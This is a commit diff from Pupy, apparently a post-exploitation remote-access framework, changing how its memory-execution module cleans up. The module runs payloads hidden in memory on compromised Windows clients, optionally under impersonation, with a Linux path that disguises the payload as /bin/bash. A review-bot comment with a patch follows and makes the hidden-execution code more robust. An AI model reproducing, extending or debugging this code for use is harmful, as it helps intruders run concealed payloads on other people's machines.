windows/memexec: Fix cleanup a bit

This commit is contained in:
Oleksii Shevchuk 2018-11-29 15:36:18 +02:00
parent bd7e256c2b
commit 8438b28554
2 changed files with 25 additions and 11 deletions


@ -39,7 +39,8 @@ class MemoryDuplicate(PupyModule):
if self.client.is_windows(): if self.client.is_windows():
exec_pe( exec_pe(
self, "", raw_pe=payload, interactive=False, self, "", raw_pe=payload, interactive=False,
use_impersonation=args.impersonate, suspended_process=args.process use_impersonation=args.impersonate, suspended_process=args.process,
wait=False
) )
elif self.client.is_linux(): elif self.client.is_linux():
mexec(self, payload, [], argv0='/bin/bash', raw=True) mexec(self, payload, [], argv0='/bin/bash', raw=True)


@ -7,7 +7,7 @@ from modules.lib.utils.cmdrepl import CmdRepl
import threading import threading
def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_impersonation=False, suspended_process="cmd.exe", codepage=None): def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_impersonation=False, suspended_process="cmd.exe", codepage=None, wait=True):
if not raw_pe and not path: if not raw_pe and not path:
raise Exception("raw_pe or path must be supplied") raise Exception("raw_pe or path must be supplied")
@ -42,7 +42,7 @@ def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_im
if not hasattr(module, 'mp'): if not hasattr(module, 'mp'):
setattr(module, 'mp', None) setattr(module, 'mp', None)
module.mp = module.client.conn.modules[ mp = module.client.conn.modules[
'pupwinutils.memexec' 'pupwinutils.memexec'
].MemoryPE( ].MemoryPE(
raw_pe, args=prog_args, hidden=True, raw_pe, args=prog_args, hidden=True,
@ -50,26 +50,29 @@ def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_im
dupHandle=dupHandle dupHandle=dupHandle
) )
module.mp = mp
complete = threading.Event() complete = threading.Event()
stdout = None
if interactive: if interactive:
repl, _ = CmdRepl.thread( repl, _ = CmdRepl.thread(
module.stdout, module.stdout,
module.mp.write, mp.write,
complete, complete,
True, None, True, None,
codepage codepage
) )
module.client.conn.register_remote_cleanup( module.client.conn.register_remote_cleanup(
module.mp.close mp.close
) )
if module.mp.execute(complete.set, repl._con_write):
if mp.execute(complete.set, repl._con_write):
complete.wait() complete.wait()
module.mp.close() mp.close()
module.client.conn.unregister_remote_cleanup( module.client.conn.unregister_remote_cleanup(
module.mp.close mp.close
) )
module.success('Process exited. Press ENTER') module.success('Process exited. Press ENTER')
@ -77,11 +80,21 @@ def exec_pe(module, prog_args, path=None, raw_pe=None, interactive=False, use_im
complete.set() complete.set()
module.error('Launch failed. Press ENTER') module.error('Launch failed. Press ENTER')
else: else:
pid = module.mp.execute(complete.set) pid = mp.execute(complete.set)
if pid: if pid:
complete.wait()
module.success('[Process launched: PID={}]'.format(pid)) module.success('[Process launched: PID={}]'.format(pid))
if not wait:
mp.close()
module.mp = None
return
complete.wait()
stdout = mp.stdout
mp.close()
module.mp = None
else: else:
module.error('Launch failed') module.error('Launch failed')
return module.mp.stdout return stdout
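Review bot: In the non-interactive wait path (the -77 hunk), `complete.wait()` is unprotected, so an interrupt while waiting skips `mp.close()` and leaves `module.mp` pointing at a still-open MemoryPE, and unlike the interactive branch this path never registers `mp.close` via `module.client.conn.register_remote_cleanup`. The `else: module.error('Launch failed')` branch likewise neither closes `mp` nor resets `module.mp`, and in the interactive branch `module.mp = mp` is still set after `mp.close()` at the "Process exited" point, so the two paths leave different state behind for the same outcome. Wrapping the wait in `try`/`finally` and mirroring the interactive branch's cleanup registration would make teardown consistent; whether `close()` is safe on a MemoryPE whose `execute()` returned a falsy pid is not visible here and should be confirmed before adding it to the failure branch. `return stdout` now yields `None` for interactive callers where the old code returned `module.mp.stdout`, and the new `wait` keyword is undocumented; a docstring line such as `wait: when False, return right after launch without collecting stdout (result is None)` would pin the contract. The `exec_pe` body between the shown hunks is outside this view.
```python
        pid = mp.execute(complete.set)
        if pid:
            module.success('[Process launched: PID={}]'.format(pid))
            if not wait:
                mp.close()
                module.mp = None
                return
            module.client.conn.register_remote_cleanup(mp.close)
            try:
                complete.wait()
                stdout = mp.stdout
            finally:
                module.client.conn.unregister_remote_cleanup(mp.close)
                mp.close()
                module.mp = None
        else:
            module.error('Launch failed')
            # TODO(review): confirm close() is valid when execute() failed
            mp.close()
            module.mp = None
    return stdout
```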